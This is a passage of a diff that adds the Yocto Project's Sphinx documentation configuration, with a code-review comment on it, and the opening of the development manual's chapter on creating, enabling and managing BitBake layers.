+++ b/documentation/conf.py
@@ -0,0 +1,151 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# SPDX-License-Identifier: CC-BY-SA-2.0-UK
+#
+# This file only contains a selection of the most common options. For a full
+# list see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Path setup --------------------------------------------------------------
+
+# If extensions (or modules to document with autodoc) are in another directory,
+# add these directories to sys.path here. If the directory is relative to the
+# documentation root, use os.path.abspath to make it absolute, like shown here.
+#
+import os
+import sys
+import datetime
+try:
+ import yaml
+except ImportError:
+ sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
+ \nPlease make sure to install pyyaml python package.\n")
+ sys.exit(1)
+
+# current_version = "dev"
+# bitbake_version = "" # Leave empty for development branch
+# Obtain versions from poky.yaml instead
+with open("poky.yaml") as data:
+ buff = data.read()
+ subst_vars = yaml.safe_load(buff)
+ if "DOCCONF_VERSION" not in subst_vars:
+ sys.stderr.write("Please set DOCCONF_VERSION in poky.yaml")
+ sys.exit(1)
+ current_version = subst_vars["DOCCONF_VERSION"]
+ if "BITBAKE_SERIES" not in subst_vars:
+ sys.stderr.write("Please set BITBAKE_SERIES in poky.yaml")
+ sys.exit(1)
+ bitbake_version = subst_vars["BITBAKE_SERIES"]
+
+# String used in sidebar
+version = 'Version: ' + current_version
+if current_version == 'dev':
+ version = 'Version: Current Development'
+# Version seen in documentation_options.js and hence in js switchers code
+release = current_version
+
+
+# -- Project information -----------------------------------------------------
+project = 'The Yocto Project \xae'
+copyright = '2010-%s, The Linux Foundation' % datetime.datetime.now().year
+author = 'The Linux Foundation'
+
+# -- General configuration ---------------------------------------------------
+
+# to load local extension from the folder 'sphinx'
+sys.path.insert(0, os.path.abspath('sphinx'))
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+ 'sphinx.ext.autosectionlabel',
+ 'sphinx.ext.extlinks',
+ 'sphinx.ext.intersphinx',
+ 'yocto-vars'
+]
+autosectionlabel_prefix_document = True
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'boilerplate.rst']
+
+# master document name. The default changed from contents to index. so better
+# set it ourselves.
+master_doc = 'index'
+
+# create substitution for project configuration variables
+rst_prolog = """
+.. |project_name| replace:: %s
+.. |copyright| replace:: %s
+.. |author| replace:: %s
+""" % (project, copyright, author)
+
+# external links and substitutions
+extlinks = {
+ 'yocto_home': ('https://yoctoproject.org%s', None),
+ 'yocto_wiki': ('https://wiki.yoctoproject.org%s', None),
+ 'yocto_dl': ('https://downloads.yoctoproject.org%s', None),
+ 'yocto_lists': ('https://lists.yoctoproject.org%s', None),
+ 'yocto_bugs': ('https://bugzilla.yoctoproject.org%s', None),
+ 'yocto_ab': ('https://autobuilder.yoctoproject.org%s', None),
+ 'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+ 'yocto_git': ('https://git.yoctoproject.org%s', None),
+ 'oe_home': ('https://www.openembedded.org%s', None),
+ 'oe_lists': ('https://lists.openembedded.org%s', None),
+ 'oe_git': ('https://git.openembedded.org%s', None),
+}
+
+# Intersphinx config to use cross reference with Bitbake user manual
+intersphinx_mapping = {
+ 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None)
+}
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages. See the documentation for
+# a list of builtin themes.
+#
+try:
+ import sphinx_rtd_theme
+ html_theme = 'sphinx_rtd_theme'
+ html_theme_options = {
+ 'sticky_navigation': False,
+ }
+except ImportError:
+ sys.stderr.write("The Sphinx sphinx_rtd_theme HTML theme was not found.\
+ \nPlease make sure to install the sphinx_rtd_theme python package.\n")
+ sys.exit(1)
+
+html_logo = 'sphinx-static/YoctoProject_Logo_RGB.jpg'
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['sphinx-static']
+
+html_context = {
+ 'current_version': current_version,
+}
+
+# Add customm CSS and JS files
+html_css_files = ['theme_overrides.css']
+html_js_files = ['switchers.js']
+
+# Hide 'Created using Sphinx' text
+html_show_sphinx = False
+
+# Add 'Last updated' on each page
+html_last_updated_fmt = '%b %d, %Y'
+
+# Remove the trailing 'dot' in section numbers
+html_secnumber_suffix = " "
+
+latex_elements = {
+ 'passoptionstopackages': '\PassOptionsToPackage{bookmarksdepth=5}{hyperref}',
+ 'preamble': '\setcounter{tocdepth}{2}',
+}
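Review bot: The two `latex_elements` values at the end of conf.py are ordinary string literals containing `\P` and `\s`, which are not valid Python escape sequences. Current interpreters only warn about them (DeprecationWarning, SyntaxWarning on newer releases), so both should be raw strings, e.g. `'preamble': r'\setcounter{tocdepth}{2}',` and the same `r` prefix on the `passoptionstopackages` value. In the poky.yaml block, `yaml.safe_load` returns None for an empty file and a float for an unquoted two-part version, so the `not in subst_vars` test or `'Version: ' + current_version` would raise a TypeError instead of printing the intended message. `subst_vars = yaml.safe_load(buff) or {}` plus a check that both values are strings before they are concatenated into the sidebar text and the intersphinx URL would keep the failure readable. The two "Please set ..." messages also lack the trailing `\n` that the other stderr messages in the file carry.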
diff --git a/documentation/dev-manual/dev-manual-common-tasks.rst b/documentation/dev-manual/dev-manual-common-tasks.rst
new file mode 100644
index 0000000000..d1dde6d0f3
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-common-tasks.rst
@@ -0,0 +1,11683 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Common Tasks
+************
+
+This chapter describes fundamental procedures such as creating layers,
+adding new software packages, extending or customizing images, porting
+work to new hardware (adding a new machine), and so forth. You will find
+that the procedures documented here occur often in the development cycle
+using the Yocto Project.
+
+Understanding and Creating Layers
+=================================
+
+The OpenEmbedded build system supports organizing
+:term:`Metadata` into multiple layers.
+Layers allow you to isolate different types of customizations from each
+other. For introductory information on the Yocto Project Layer Model,
+see the
+":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+section in the Yocto Project Overview and Concepts Manual.
+
+Creating Your Own Layer
+-----------------------
+
+It is very easy to create your own layers to use with the OpenEmbedded
+build system. The Yocto Project ships with tools that speed up creating
+layers. This section describes the steps you perform by hand to create
+layers so that you can better understand them. For information about the
+layer-creation tools, see the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section in the Yocto Project Board Support Package (BSP) Developer's
+Guide and the ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+section further down in this manual.
+
+Follow these general steps to create your layer without using tools:
+
+1. *Check Existing Layers:* Before creating a new layer, you should be
+ sure someone has not already created a layer containing the Metadata
+ you need. You can see the `OpenEmbedded Metadata
+ Index <https://layers.openembedded.org/layerindex/layers/>`__ for a
+ list of layers from the OpenEmbedded community that can be used in
+ the Yocto Project. You could find a layer that is identical or close
+ to what you need.
+
+2. *Create a Directory:* Create the directory for your layer. When you
+ create the layer, be sure to create the directory in an area not
+ associated with the Yocto Project :term:`Source Directory`
+ (e.g. the cloned ``poky`` repository).
+
+ While not strictly required, prepend the name of the directory with
+ the string "meta-". For example:
+ ::
+
+ meta-mylayer
+ meta-GUI_xyz
+ meta-mymachine
+
+ With rare exceptions, a layer's name follows this form:
+ ::
+
+ meta-root_name
+
+ Following this layer naming convention can save
+ you trouble later when tools, components, or variables "assume" your
+ layer name begins with "meta-". A notable example is in configuration
+ files as shown in the following step where layer names without the
+ "meta-" string are appended to several variables used in the
+ configuration.
+
+3. *Create a Layer Configuration File:* Inside your new layer folder,
+ you need to create a ``conf/layer.conf`` file. It is easiest to take
+ an existing layer configuration file and copy that to your layer's
+ ``conf`` directory and then modify the file as needed.
+
+ The ``meta-yocto-bsp/conf/layer.conf`` file in the Yocto Project
+ :yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf>`
+ demonstrates the required syntax. For your layer, you need to replace
+ "yoctobsp" with a unique identifier for your layer (e.g. "machinexyz"
+ for a layer named "meta-machinexyz"):
+ ::
+
+ # We have a conf and classes directory, add to BBPATH
+ BBPATH .= ":${LAYERDIR}"
+
+ # We have recipes-* directories, add to BBFILES
+ BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+ ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+ BBFILE_COLLECTIONS += "yoctobsp"
+ BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
+ BBFILE_PRIORITY_yoctobsp = "5"
+ LAYERVERSION_yoctobsp = "4"
+ LAYERSERIES_COMPAT_yoctobsp = "dunfell"
+
+ Following is an explanation of the layer configuration file:
+
+ - :term:`BBPATH`: Adds the layer's
+ root directory to BitBake's search path. Through the use of the
+ ``BBPATH`` variable, BitBake locates class files (``.bbclass``),
+ configuration files, and files that are included with ``include``
+ and ``require`` statements. For these cases, BitBake uses the
+ first file that matches the name found in ``BBPATH``. This is
+ similar to the way the ``PATH`` variable is used for binaries. It
+ is recommended, therefore, that you use unique class and
+ configuration filenames in your custom layer.
+
+ - :term:`BBFILES`: Defines the
+ location for all recipes in the layer.
+
+ - :term:`BBFILE_COLLECTIONS`:
+ Establishes the current layer through a unique identifier that is
+ used throughout the OpenEmbedded build system to refer to the
+ layer. In this example, the identifier "yoctobsp" is the
+ representation for the container layer named "meta-yocto-bsp".
+
+ - :term:`BBFILE_PATTERN`:
+ Expands immediately during parsing to provide the directory of the
+ layer.
+
+ - :term:`BBFILE_PRIORITY`:
+ Establishes a priority to use for recipes in the layer when the
+ OpenEmbedded build finds recipes of the same name in different
+ layers.
+
+ - :term:`LAYERVERSION`:
+ Establishes a version number for the layer. You can use this
+ version number to specify this exact version of the layer as a
+ dependency when using the
+ :term:`LAYERDEPENDS`
+ variable.
+
+ - :term:`LAYERDEPENDS`:
+ Lists all layers on which this layer depends (if any).
+
+ - :term:`LAYERSERIES_COMPAT`:
+ Lists the :yocto_wiki:`Yocto Project </wiki/Releases>`
+ releases for which the current version is compatible. This
+ variable is a good way to indicate if your particular layer is
+ current.
+
+4. *Add Content:* Depending on the type of layer, add the content. If
+ the layer adds support for a machine, add the machine configuration
+ in a ``conf/machine/`` file within the layer. If the layer adds
+ distro policy, add the distro configuration in a ``conf/distro/``
+ file within the layer. If the layer introduces new recipes, put the
+ recipes you need in ``recipes-*`` subdirectories within the layer.
+
+ .. note::
+
+ For an explanation of layer hierarchy that is compliant with the
+ Yocto Project, see the ":ref:`bsp-guide/bsp:example filesystem layout`"
+ section in the Yocto Project Board Support Package (BSP) Developer's Guide.
+
+5. *Optionally Test for Compatibility:* If you want permission to use
+ the Yocto Project Compatibility logo with your layer or application
+ that uses your layer, perform the steps to apply for compatibility.
+ See the "`Making Sure Your Layer is Compatible With Yocto
+ Project <#making-sure-your-layer-is-compatible-with-yocto-project>`__"
+ section for more information.
+
+.. _best-practices-to-follow-when-creating-layers:
+
+Following Best Practices When Creating Layers
+---------------------------------------------
+
+To create layers that are easier to maintain and that will not impact
+builds for other machines, you should consider the information in the
+following list:
+
+- *Avoid "Overlaying" Entire Recipes from Other Layers in Your
+ Configuration:* In other words, do not copy an entire recipe into
+ your layer and then modify it. Rather, use an append file
+ (``.bbappend``) to override only those parts of the original recipe
+ you need to modify.
+
+- *Avoid Duplicating Include Files:* Use append files (``.bbappend``)
+ for each recipe that uses an include file. Or, if you are introducing
+ a new recipe that requires the included file, use the path relative
+ to the original layer directory to refer to the file. For example,
+ use ``require recipes-core/``\ `package`\ ``/``\ `file`\ ``.inc`` instead
+ of ``require`` `file`\ ``.inc``. If you're finding you have to overlay
+ the include file, it could indicate a deficiency in the include file
+ in the layer to which it originally belongs. If this is the case, you
+ should try to address that deficiency instead of overlaying the
+ include file. For example, you could address this by getting the
+ maintainer of the include file to add a variable or variables to make
+ it easy to override the parts needing to be overridden.
+
+- *Structure Your Layers:* Proper use of overrides within append files
+ and placement of machine-specific files within your layer can ensure
+ that a build is not using the wrong Metadata and negatively impacting
+ a build for a different machine. Following are some examples:
+
+ - *Modify Variables to Support a Different Machine:* Suppose you
+ have a layer named ``meta-one`` that adds support for building
+ machine "one". To do so, you use an append file named
+ ``base-files.bbappend`` and create a dependency on "foo" by
+ altering the :term:`DEPENDS`
+ variable:
+ ::
+
+ DEPENDS = "foo"
+
+ The dependency is created during any
+ build that includes the layer ``meta-one``. However, you might not
+ want this dependency for all machines. For example, suppose you
+ are building for machine "two" but your ``bblayers.conf`` file has
+ the ``meta-one`` layer included. During the build, the
+ ``base-files`` for machine "two" will also have the dependency on
+ ``foo``.
+
+ To make sure your changes apply only when building machine "one",
+ use a machine override with the ``DEPENDS`` statement:
+ ::
+
+ DEPENDS_one = "foo"
+
+ You should follow the same strategy when using ``_append``
+ and ``_prepend`` operations:
+ ::
+
+ DEPENDS_append_one = " foo"
+ DEPENDS_prepend_one = "foo "
+
+ As an actual example, here's a
+ snippet from the generic kernel include file ``linux-yocto.inc``,
+ wherein the kernel compile and link options are adjusted in the
+ case of a subset of the supported architectures:
+ ::
+
+ DEPENDS_append_aarch64 = " libgcc"
+ KERNEL_CC_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
+ KERNEL_LD_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
+
+ DEPENDS_append_nios2 = " libgcc"
+ KERNEL_CC_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
+ KERNEL_LD_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
+
+ DEPENDS_append_arc = " libgcc"
+ KERNEL_CC_append_arc = " ${TOOLCHAIN_OPTIONS}"
+ KERNEL_LD_append_arc = " ${TOOLCHAIN_OPTIONS}"
+
+ KERNEL_FEATURES_append_qemuall=" features/debug/printk.scc"
+
+ .. note::
+
+ Avoiding "+=" and "=+" and using machine-specific ``_append``
+ and ``_prepend`` operations is recommended as well.
+
+ - *Place Machine-Specific Files in Machine-Specific Locations:* When
+ you have a base recipe, such as ``base-files.bb``, that contains a
+ :term:`SRC_URI` statement to a
+ file, you can use an append file to cause the build to use your
+ own version of the file. For example, an append file in your layer
+ at ``meta-one/recipes-core/base-files/base-files.bbappend`` could
+ extend :term:`FILESPATH` using :term:`FILESEXTRAPATHS` as follows:
+ ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${BPN}:"
+
+ The build for machine "one" will pick up your machine-specific file as
+ long as you have the file in
+ ``meta-one/recipes-core/base-files/base-files/``. However, if you
+ are building for a different machine and the ``bblayers.conf``
+ file includes the ``meta-one`` layer and the location of your
+ machine-specific file is the first location where that file is
+ found according to ``FILESPATH``, builds for all machines will
+ also use that machine-specific file.
+
+ You can make sure that a machine-specific file is used for a
+ particular machine by putting the file in a subdirectory specific
+ to the machine. For example, rather than placing the file in
+ ``meta-one/recipes-core/base-files/base-files/`` as shown above,
+ put it in ``meta-one/recipes-core/base-files/base-files/one/``.
+ Not only does this make sure the file is used only when building
+ for machine "one", but the build process locates the file more
+ quickly.
+
+ In summary, you need to place all files referenced from
+ ``SRC_URI`` in a machine-specific subdirectory within the layer in
+ order to restrict those files to machine-specific builds.
+
+- *Perform Steps to Apply for Yocto Project Compatibility:* If you want
+ permission to use the Yocto Project Compatibility logo with your
+ layer or application that uses your layer, perform the steps to apply
+ for compatibility. See the "`Making Sure Your Layer is Compatible
+ With Yocto
+ Project <#making-sure-your-layer-is-compatible-with-yocto-project>`__"
+ section for more information.
+
+- *Follow the Layer Naming Convention:* Store custom layers in a Git
+ repository that use the ``meta-layer_name`` format.
+
+- *Group Your Layers Locally:* Clone your repository alongside other
+ cloned ``meta`` directories from the :term:`Source Directory`.
+
+Making Sure Your Layer is Compatible With Yocto Project
+-------------------------------------------------------
+
+When you create a layer used with the Yocto Project, it is advantageous
+to make sure that the layer interacts well with existing Yocto Project
+layers (i.e. the layer is compatible with the Yocto Project). Ensuring
+compatibility makes the layer easy to be consumed by others in the Yocto
+Project community and could allow you permission to use the Yocto
+Project Compatible Logo.
+
+.. note::
+
+ Only Yocto Project member organizations are permitted to use the
+ Yocto Project Compatible Logo. The logo is not available for general
+ use. For information on how to become a Yocto Project member
+ organization, see the :yocto_home:`Yocto Project Website <>`.
+
+The Yocto Project Compatibility Program consists of a layer application
+process that requests permission to use the Yocto Project Compatibility
+Logo for your layer and application. The process consists of two parts:
+
+1. Successfully passing a script (``yocto-check-layer``) that when run
+ against your layer, tests it against constraints based on experiences
+ of how layers have worked in the real world and where pitfalls have
+ been found. Getting a "PASS" result from the script is required for
+ successful compatibility registration.
+
+2. Completion of an application acceptance form, which you can find at
+ https://www.yoctoproject.org/webform/yocto-project-compatible-registration.
+
+To be granted permission to use the logo, you need to satisfy the
+following:
+
+- Be able to check the box indicating that you got a "PASS" when
+ running the script against your layer.
+
+- Answer "Yes" to the questions on the form or have an acceptable
+ explanation for any questions answered "No".
+
+- Be a Yocto Project Member Organization.
+
+The remainder of this section presents information on the registration
+form and on the ``yocto-check-layer`` script.
+
+Yocto Project Compatible Program Application
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Use the form to apply for your layer's approval. Upon successful
+application, you can use the Yocto Project Compatibility Logo with your
+layer and the application that uses your layer.
+
+To access the form, use this link:
+https://www.yoctoproject.org/webform/yocto-project-compatible-registration.
+Follow the instructions on the form to complete your application.
+
+The application consists of the following sections:
+
+- *Contact Information:* Provide your contact information as the fields
+ require. Along with your information, provide the released versions
+ of the Yocto Project for which your layer is compatible.
+
+- *Acceptance Criteria:* Provide "Yes" or "No" answers for each of the
+ items in the checklist. Space exists at the bottom of the form for
+ any explanations for items for which you answered "No".
+
+- *Recommendations:* Provide answers for the questions regarding Linux
+ kernel use and build success.
+
+``yocto-check-layer`` Script
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``yocto-check-layer`` script provides you a way to assess how
+compatible your layer is with the Yocto Project. You should run this
+script prior to using the form to apply for compatibility as described
+in the previous section. You need to achieve a "PASS" result in order to
+have your application form successfully processed.
+
+The script divides tests into three areas: COMMON, BSP, and DISTRO. For
+example, given a distribution layer (DISTRO), the layer must pass both
+the COMMON and DISTRO related tests. Furthermore, if your layer is a BSP
+layer, the layer must pass the COMMON and BSP set of tests.
+
+To execute the script, enter the following commands from your build
+directory:
+::
+
+ $ source oe-init-build-env
+ $ yocto-check-layer your_layer_directory
+
+Be sure to provide the actual directory for your
+layer as part of the command.
+
+Entering the command causes the script to determine the type of layer
+and then to execute a set of specific tests against the layer. The
+following list overviews the test:
+
+- ``common.test_readme``: Tests if a ``README`` file exists in the
+ layer and the file is not empty.
+
+- ``common.test_parse``: Tests to make sure that BitBake can parse the
+ files without error (i.e. ``bitbake -p``).
+
+- ``common.test_show_environment``: Tests that the global or per-recipe
+ environment is in order without errors (i.e. ``bitbake -e``).
+
+- ``common.test_world``: Verifies that ``bitbake world`` works.
+
+- ``common.test_signatures``: Tests to be sure that BSP and DISTRO
+ layers do not come with recipes that change signatures.
+
+- ``common.test_layerseries_compat``: Verifies layer compatibility is
+ set properly.
+
+- ``bsp.test_bsp_defines_machines``: Tests if a BSP layer has machine
+ configurations.
+
+- ``bsp.test_bsp_no_set_machine``: Tests to ensure a BSP layer does not
+ set the machine when the layer is added.
+
+- ``bsp.test_machine_world``: Verifies that ``bitbake world`` works
+ regardless of which machine is selected.
+
+- ``bsp.test_machine_signatures``: Verifies that building for a
+ particular machine affects only the signature of tasks specific to
+ that machine.
+
+- ``distro.test_distro_defines_distros``: Tests if a DISTRO layer has
+ distro configurations.
+
+- ``distro.test_distro_no_set_distros``: Tests to ensure a DISTRO layer
+ does not set the distribution when the layer is added.
+
+Enabling Your Layer
+-------------------
+
+Before the OpenEmbedded build system can use your new layer, you need to
+enable it. To enable your layer, simply add your layer's path to the
+``BBLAYERS`` variable in your ``conf/bblayers.conf`` file, which is
+found in the :term:`Build Directory`.
+The following example shows how to enable a layer named
+``meta-mylayer``:
+::
+
+ # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
+ # changes incompatibly
+ POKY_BBLAYERS_CONF_VERSION = "2"
+ BBPATH = "${TOPDIR}"
+ BBFILES ?= ""
+ BBLAYERS ?= " \
+ /home/user/poky/meta \
+ /home/user/poky/meta-poky \
+ /home/user/poky/meta-yocto-bsp \
+ /home/user/poky/meta-mylayer \
+ "
+
+BitBake parses each ``conf/layer.conf`` file from the top down as
+specified in the ``BBLAYERS`` variable within the ``conf/bblayers.conf``
+file. During the processing of each ``conf/layer.conf`` file, BitBake
+adds the recipes, classes and configurations contained within the
+particular layer to the source directory.
+
+.. _using-bbappend-files:
+
+Using .bbappend Files in Your Layer
+-----------------------------------
+
+A recipe that appends Metadata to another recipe is called a BitBake
+append file. A BitBake append file uses the ``.bbappend`` file type
+suffix, while the corresponding recipe to which Metadata is being
+appended uses the ``.bb`` file type suffix.
+
+You can use a ``.bbappend`` file in your layer to make additions or
+changes to the content of another layer's recipe without having to copy
+the other layer's recipe into your layer. Your ``.bbappend`` file
+resides in your layer, while the main ``.bb`` recipe file to which you
+are appending Metadata resides in a different layer.
+
+Being able to append information to an existing recipe not only avoids
+duplication, but also automatically applies recipe changes from a
+different layer into your layer. If you were copying recipes, you would
+have to manually merge changes as they occur.
+
+When you create an append file, you must use the same root name as the
+corresponding recipe file. For example, the append file
+``someapp_3.1.bbappend`` must apply to ``someapp_3.1.bb``. This
+means the original recipe and append file names are version
+number-specific. If the corresponding recipe is renamed to update to a
+newer version, you must also rename and possibly update the
+corresponding ``.bbappend`` as well. During the build process, BitBake
+displays an error on starting if it detects a ``.bbappend`` file that
+does not have a corresponding recipe with a matching name. See the
+:term:`BB_DANGLINGAPPENDS_WARNONLY`
+variable for information on how to handle this error.
+
+As an example, consider the main formfactor recipe and a corresponding
+formfactor append file both from the :term:`Source Directory`.
+Here is the main
+formfactor recipe, which is named ``formfactor_0.0.bb`` and located in
+the "meta" layer at ``meta/recipes-bsp/formfactor``:
+::
+
+ SUMMARY = "Device formfactor information"
+ DESCRIPTION = "A formfactor configuration file provides information about the \
+ target hardware for which the image is being built and information that the \
+ build system cannot obtain from other sources such as the kernel."
+ SECTION = "base"
+ LICENSE = "MIT"
+ LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+ PR = "r45"
+
+ SRC_URI = "file://config file://machconfig"
+ S = "${WORKDIR}"
+
+ PACKAGE_ARCH = "${MACHINE_ARCH}"
+ INHIBIT_DEFAULT_DEPS = "1"
+
+ do_install() {
+ # Install file only if it has contents
+ install -d ${D}${sysconfdir}/formfactor/
+ install -m 0644 ${S}/config ${D}${sysconfdir}/formfactor/
+ if [ -s "${S}/machconfig" ]; then
+ install -m 0644 ${S}/machconfig ${D}${sysconfdir}/formfactor/
+ fi
+ }
+
+In the main recipe, note the :term:`SRC_URI`
+variable, which tells the OpenEmbedded build system where to find files
+during the build.
+
+Following is the append file, which is named ``formfactor_0.0.bbappend``
+and is from the Raspberry Pi BSP Layer named ``meta-raspberrypi``. The
+file is in the layer at ``recipes-bsp/formfactor``:
+::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+By default, the build system uses the
+:term:`FILESPATH` variable to
+locate files. This append file extends the locations by setting the
+:term:`FILESEXTRAPATHS`
+variable. Setting this variable in the ``.bbappend`` file is the most
+reliable and recommended method for adding directories to the search
+path used by the build system to find files.
+
+The statement in this example extends the directories to include
+``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``,
+which resolves to a directory named ``formfactor`` in the same directory
+in which the append file resides (i.e.
+``meta-raspberrypi/recipes-bsp/formfactor``. This implies that you must
+have the supporting directory structure set up that will contain any
+files or patches you will be including from the layer.
+
+Using the immediate expansion assignment operator ``:=`` is important
+because of the reference to ``THISDIR``. The trailing colon character is
+important as it ensures that items in the list remain colon-separated.
+
+.. note::
+
+ BitBake automatically defines the ``THISDIR`` variable. You should
+ never set this variable yourself. Using "_prepend" as part of the
+ ``FILESEXTRAPATHS`` ensures your path will be searched prior to other
+ paths in the final list.
+
+ Also, not all append files add extra files. Many append files simply
+ exist to add build options (e.g. ``systemd``). For these cases, your
+ append file would not even use the ``FILESEXTRAPATHS`` statement.
+
+Prioritizing Your Layer
+-----------------------
+
+Each layer is assigned a priority value. Priority values control which
+layer takes precedence if there are recipe files with the same name in
+multiple layers. For these cases, the recipe file from the layer with a
+higher priority number takes precedence. Priority values also affect the
+order in which multiple ``.bbappend`` files for the same recipe are
+applied. You can either specify the priority manually, or allow the
+build system to calculate it based on the layer's dependencies.
+
+To specify the layer's priority manually, use the
+:term:`BBFILE_PRIORITY`
+variable and append the layer's root name:
+::
+
+ BBFILE_PRIORITY_mylayer = "1"
+
+.. note::
+
+ It is possible for a recipe with a lower version number
+ :term:`PV` in a layer that has a higher
+ priority to take precedence.
+
+ Also, the layer priority does not currently affect the precedence
+ order of ``.conf`` or ``.bbclass`` files. Future versions of BitBake
+ might address this.
+
+Managing Layers
+---------------
+
+You can use the BitBake layer management tool ``bitbake-layers`` to
+provide a view into the structure of recipes across a multi-layer
+project. Being able to generate output that reports on configured layers
+with their paths and priorities and on ``.bbappend`` files and their
+applicable recipes can help to reveal potential problems.
+
+For help on the BitBake layer management tool, use the following
+command:
+::
+
+ $ bitbake-layers --help
+ NOTE: Starting bitbake server...
+ usage: bitbake-layers [-d] [-q] [-F] [--color COLOR] [-h] <subcommand> ...
+
+ BitBake layers utility
+
+ optional arguments:
+ -d, --debug Enable debug output
+ -q, --quiet Print only errors
+ -F, --force Force add without recipe parse verification
+ --color COLOR Colorize output (where COLOR is auto, always, never)
+ -h, --help show this help message and exit
+
+ subcommands:
+ <subcommand>
+ layerindex-fetch Fetches a layer from a layer index along with its
+ dependent layers, and adds them to conf/bblayers.conf.
+ layerindex-show-depends
+ Find layer dependencies from layer index.
+ add-layer Add one or more layers to bblayers.conf.
+ remove-layer Remove one or more layers from bblayers.conf.
+ flatten flatten layer configuration into a separate output
+ directory.
+ show-layers show current configured layers.
+ show-overlayed list overlayed recipes (where the same recipe exists
+ in another layer)
+ show-recipes list available recipes, showing the layer they are
+ provided by
+ show-appends list bbappend files and recipe files they apply to
+ show-cross-depends Show dependencies between recipes that cross layer
+ boundaries.
+ create-layer Create a basic layer
+
+ Use bitbake-layers <subcommand> --help to get help on a specific command
+
+The following list describes the available commands:
+
+- ``help:`` Displays general help or help on a specified command.
+
+- ``show-layers:`` Shows the current configured layers.
+
+- ``show-overlayed:`` Lists overlayed recipes. A recipe is overlayed
+ when a recipe with the same name exists in another layer that has a
+ higher layer priority.
+
+- ``show-recipes:`` Lists available recipes and the layers that
+ provide them.
+
+- ``show-appends:`` Lists ``.bbappend`` files and the recipe files to
+ which they apply.
+
+- ``show-cross-depends:`` Lists dependency relationships between
+ recipes that cross layer boundaries.
+
+- ``add-layer:`` Adds a layer to ``bblayers.conf``.
+
+- ``remove-layer:`` Removes a layer from ``bblayers.conf``
+
+- ``flatten:`` Flattens the layer configuration into a separate
+ output directory. Flattening your layer configuration builds a
+ "flattened" directory that contains the contents of all layers, with
+ any overlayed recipes removed and any ``.bbappend`` files appended to
+ the corresponding recipes. You might have to perform some manual
+ cleanup of the flattened layer as follows:
+
+ - Non-recipe files (such as patches) are overwritten. The flatten
+ command shows a warning for these files.
+
+ - Anything beyond the normal layer setup has been added to the
+ ``layer.conf`` file. Only the lowest priority layer's
+ ``layer.conf`` is used.
+
+ - Overridden and appended items from ``.bbappend`` files need to be
+ cleaned up. The contents of each ``.bbappend`` end up in the
+ flattened recipe. However, if there are appended or changed
+ variable values, you need to tidy these up yourself. Consider the
+ following example. Here, the ``bitbake-layers`` command adds the
+ line ``#### bbappended ...`` so that you know where the following
+ lines originate:
+ ::
+
+ ...
+ DESCRIPTION = "A useful utility"
+ ...
+ EXTRA_OECONF = "--enable-something"
+ ...
+
+ #### bbappended from meta-anotherlayer ####
+
+ DESCRIPTION = "Customized utility"
+ EXTRA_OECONF += "--enable-somethingelse"
+
+
+ Ideally, you would tidy up these utilities as follows:
+ ::
+
+ ...
+ DESCRIPTION = "Customized utility"
+ ...
+ EXTRA_OECONF = "--enable-something --enable-somethingelse"
+ ...
+
+- ``layerindex-fetch``: Fetches a layer from a layer index, along
+ with its dependent layers, and adds the layers to the
+ ``conf/bblayers.conf`` file.
+
+- ``layerindex-show-depends``: Finds layer dependencies from the
+ layer index.
+
+- ``create-layer``: Creates a basic layer.
+
+Creating a General Layer Using the ``bitbake-layers`` Script
+------------------------------------------------------------
+
+The ``bitbake-layers`` script with the ``create-layer`` subcommand
+simplifies creating a new general layer.
+
+.. note::
+
+ - For information on BSP layers, see the ":ref:`bsp-guide/bsp:bsp layers`"
+ section in the Yocto
+ Project Board Specific (BSP) Developer's Guide.
+
+ - In order to use a layer with the OpenEmbedded build system, you
+ need to add the layer to your ``bblayers.conf`` configuration
+ file. See the ":ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`"
+ section for more information.
+
+The default mode of the script's operation with this subcommand is to
+create a layer with the following:
+
+- A layer priority of 6.
+
+- A ``conf`` subdirectory that contains a ``layer.conf`` file.
+
+- A ``recipes-example`` subdirectory that contains a further
+ subdirectory named ``example``, which contains an ``example.bb``
+ recipe file.
+
+- A ``COPYING.MIT``, which is the license statement for the layer. The
+ script assumes you want to use the MIT license, which is typical for
+ most layers, for the contents of the layer itself.
+
+- A ``README`` file, which is a file describing the contents of your
